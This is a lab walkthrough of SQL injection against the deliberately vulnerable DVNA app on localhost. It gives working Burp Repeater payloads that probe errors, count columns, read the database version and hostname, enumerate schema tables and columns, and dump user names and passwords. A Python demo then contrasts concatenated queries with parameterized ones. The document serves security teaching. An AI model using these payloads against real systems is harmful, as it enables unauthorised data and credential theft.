SQL Injection in DVNA
Step 1: Register a user on the application at http://localhost:9090/register and log in to the application at http://localhost:9090/login
Step 2: Click on Login under "A1: Injection" > "SQL Injection: User Search"
Step 3: On the "User Search" page, enter a string and click Enter. Capture the request that is made using Burp Intercept
Step 4: Send the intercepted request to Burp Repeater (CTRL+R) and navigate to Repeater (CTRL+SHIFT+R)
Step 5: In the POST request in Repeater, modify the login parameter in POST body to a single quote (') and forward the request. Notice that the application generates an "Internal Error"
Step 6: In the POST request in Repeater, modify the login parameter in POST body to ' OR 1 -- // and forward the request. Notice that the application returns a user name and ID
Step 1: In the POST request in Repeater, modify the login parameter in POST body to 1' ORDER BY 3 -- // and forward the request. Notice that the application returns an internal error. Modify the parameter to 1' ORDER BY 2 -- // and notice the application doesn't generate an internal error
Step 2: In the POST request in Repeater, modify the login parameter in POST body to 1' UNION SELECT concat(database(),'%3b ',@@version,'%3b ',@@hostname),2 -- // and forward the request
Step 3: In the POST request in Repeater, modify the login parameter in POST body to 1' UNION SELECT 1,group_concat(TABLE_NAME) FROM information_schema.TABLES WHERE table_schema like 'dvna' -- // and forward the request
Step 4: In the POST request in Repeater, modify the login parameter in POST body to ' UNION SELECT 1,group_concat(DISTINCT column_name) from information_schema.columns where table_schema='dvna' -- // and forward the request
Step 5: In the POST request in Repeater, modify the login parameter in POST body to ' UNION SELECT group_concat(DISTINCT name,"%3b",password),1 from Users -- // and forward the request
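
The behaviour seen in the steps above (an error on a single quote, rows returned for ' OR 1 -- //, an error on ORDER BY 3 but not ORDER BY 2) follows from the login value being concatenated into the SQL text. The following is an added example, not DVNA's own code: it reproduces that behaviour with Python's sqlite3 standing in for DVNA's MySQL backend and shows the same inputs against a parameterized query. The query shape, the sample rows and the function names are assumptions.

```python
import sqlite3

# Constructed sample data; the Users table name follows the page's payloads.
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE Users (id INTEGER PRIMARY KEY, name TEXT, login TEXT, password TEXT)")
    db.executemany(
        "INSERT INTO Users (name, login, password) VALUES (?, ?, ?)",
        [("Alice", "alice", "hash-a"), ("Bob", "bob", "hash-b")],
    )
    return db

def search_concat(db, login):
    """Assumed shape of the vulnerable lookup: input is spliced into the SQL text."""
    sql = "SELECT name, id FROM Users WHERE login='" + login + "'"
    try:
        return db.execute(sql).fetchall()
    except sqlite3.Error:
        return "Internal Error"  # the symptom the walkthrough observes

def search_bound(db, login):
    """Hardened lookup: the input is bound as data and never parsed as SQL."""
    return db.execute("SELECT name, id FROM Users WHERE login = ?", (login,)).fetchall()

# Inputs taken from the walkthrough steps, plus one legitimate login.
INPUTS = ["alice", "'", "' OR 1 -- //", "1' ORDER BY 3 -- //", "1' ORDER BY 2 -- //"]

def compare(db):
    """Map each input to (result with concatenation, result with binding)."""
    return {value: (search_concat(db, value), search_bound(db, value)) for value in INPUTS}

if __name__ == "__main__":
    for value, (concat, bound) in compare(make_db()).items():
        print(f"{value!r:24} concat={concat!r} bound={bound!r}")
```

With binding, every input other than the legitimate login returns an empty result and no error, so neither the error signal nor the column-count signal is available.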